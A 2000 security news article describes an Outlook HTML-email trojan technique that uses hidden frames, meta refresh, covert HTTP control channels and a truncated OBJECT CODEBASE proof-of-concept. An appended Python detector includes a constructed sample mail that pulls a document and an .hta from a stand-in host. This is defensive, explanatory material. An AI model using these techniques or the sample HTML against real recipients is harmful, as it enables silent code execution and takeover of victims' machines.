Telecom and Logistics Associates 


Publication: Christian ALT

TLAnews: Security News Service

10.7.2000 Security: Outlook scenario for a new trojan
As Microsoft software becomes more complex, an increase in security vulnerabilities seems to be inevitable, and Outlook is one of the applications that has suffered more than most. And as Internet-borne virus attacks become more numerous, it is getting harder for the IT manager to protect the system.

French summary (translated): Scenario for a new trojan with Outlook
As Microsoft software becomes more complex, an increase in vulnerabilities seems inevitable, and Outlook is one of the applications that has suffered the most. As attacks become more numerous, it is becoming harder for IT managers to protect their systems.

English version
Email messages encoded in the Web's HTML format can be used to inject malicious code onto a user's system simply through previewing or opening the main message.

Hostile email can work as follows. An HTML email is sent to the recipient. When opened or previewed it calls up a number of framesets, one of which is an innocent message. A second frameset loads a Word document from a remote server, and this is run in a zero-sized window so that it is not readily apparent. The Word document contains VBScript to run the virus writer's hostile Trojan code. If the Word installation has had the security levels set, then [virus writers use] the Office Assistant to reset them. 

French summary (translated)
Outlook has shown many weaknesses against trojan attacks. Here is a scenario that does not even require the message to be opened. It relies on the use of HTML in the message, and in particular on "Framesets". It consists of opening a message made up of several "Frames". One of them, of zero size, contains a Word document loaded from a remote site. This document contains the code carrying the virus.

The trojan can then be executed. It can open a control channel using the HTTP protocol, which firewalls generally allow through, and then send information to the outside.

If the Office Assistant is not installed, then [they] use Active Setup to do so. The result is that the Trojan is run, unless the relevant fixes for Outlook have been installed. It is important, therefore, not simply to rely on users having the sense not to open suspicious attachments: without the Microsoft fixes, email can hit and run.

The Trojan can open a so-called covert control channel via the HTTP port, which is usually admitted through firewalls, to execute code and return results. The implication is that a victim PC might be wholly controlled by the remote attacker.

This technique is a variation on a theme that uses innocuous-looking Web pages to install and run a malicious program on the surfer's PC. There are many ways to get a Trojan onto a target PC, but Barrett's technique uses HTML frames.

The frames are used to point to malicious files containing JavaScript and ActiveX, not just other HTML files. By combining this with an HTTP meta-tag known as refresh, the system can be tricked into storing files in the Windows Temp folder and subsequently running them, regardless of a user's response to the browser's warnings.

As an advisory notice first published on the Malware site puts it: "Microsoft Internet Explorer 5 and accompanying mail and news clients on Win95, Win98 and Win2000 enjoy a unique status in that they choose to ignore user input. [Hackers are] able to manually force a file onto the target computer despite all prompts and warnings."

The technique described is a new method of getting the malicious code onto the target's PC simply through mail, rather than relying on the user to browse to the correct malicious URL; in other words, it can be used to target the victim.

The latest security patches for Outlook cure the problem in preview mode but not if messages are opened, so system managers should also consider making Windows Temp folders non-executable. This would solve the security issues, but could cause problems with some application installers and setup routines.

Remotely triggered Trojans:

Virus writers do not need their Trojan to be run as soon as it is stored. If they know where it is and what it is called, they can use other HTML code to run it later. One contributor to hackers' Web site L0pht provided the following snippet to demonstrate this.

First place a copy of Calc.exe in your Windows\System32 folder. Then create a valid HTML page containing no more than the following code in the body of the page:

CODEBASE='c:\windows\system32\calc.exe'>

Open this file in Internet Explorer and watch Calc being run. It takes little imagination to see how easy it is to get a hidden Trojan to run silently.
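The traits the article describes (a frameset with a zero-sized frame pulling a remote Word document, a meta refresh redirect, and an OBJECT tag whose CODEBASE points at a local executable) are all visible in the raw HTML of a message before any client renders it. The scanner below is an added example, not code from TLAnews or from the advisories cited; the mail body it inspects is constructed here for illustration, and the thresholds (the file extensions treated as suspect) are assumptions a mail gateway operator would tune.

```python
import re
from html.parser import HTMLParser

# Constructed sample HTML mail body showing the traits described in the article.
SAMPLE_MAIL = """<html><body>
<frameset rows="*,0">
  <frame src="innocent.html">
  <frame src="http://example.invalid/report.doc" width="0" height="0">
</frameset>
<meta http-equiv="refresh" content="0;url=http://example.invalid/drop.hta">
<object codebase="c:\\windows\\system32\\calc.exe"></object>
</body></html>"""

# Assumed list of extensions a frame or object should never pull into a mail client.
SUSPECT_EXT = (".doc", ".exe", ".hta", ".vbs", ".js")


class MailScanner(HTMLParser):
    """Collect findings for frame, meta-refresh and object/embed tags in HTML mail."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag in ("frame", "iframe"):
            src = a.get("src", "").lower()
            # A frame fetching a non-HTML file from a remote host.
            if src.startswith("http") and src.endswith(SUSPECT_EXT):
                self.findings.append("frame loads remote non-HTML content: " + src)
            # A frame sized to be invisible to the reader.
            if a.get("width") == "0" or a.get("height") == "0":
                self.findings.append("zero-sized frame: " + src)
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append("meta refresh redirect: " + a.get("content", ""))
        elif tag in ("object", "embed"):
            cb = a.get("codebase", "")
            # CODEBASE naming a local drive path or an executable type.
            if re.match(r"^[a-z]:\\", cb.lower()) or cb.lower().endswith(SUSPECT_EXT):
                self.findings.append("object codebase points at a local or executable file: " + cb)


def scan_html_mail(body):
    """Return the list of findings for one HTML mail body (empty list if clean)."""
    scanner = MailScanner()
    scanner.feed(body)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for finding in scan_html_mail(SAMPLE_MAIL):
        print(finding)
```

A gateway would quarantine or strip any message producing a finding rather than relying on the client's patch level.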

 
Author information.
Copyright © [Telecom and Logistics Associates Sàrl]. All rights reserved.
Revised: July 10, 2000.

All information provided is of a general nature and is not intended to address the circumstances of any particular individual or entity. Although we endeavor to provide accurate and timely information, there can be no guarantee that such information is accurate as of the date it is received or that it will continue to be accurate in the future. No one should act upon such information without appropriate professional advice after a thorough examination of the facts of the particular situation.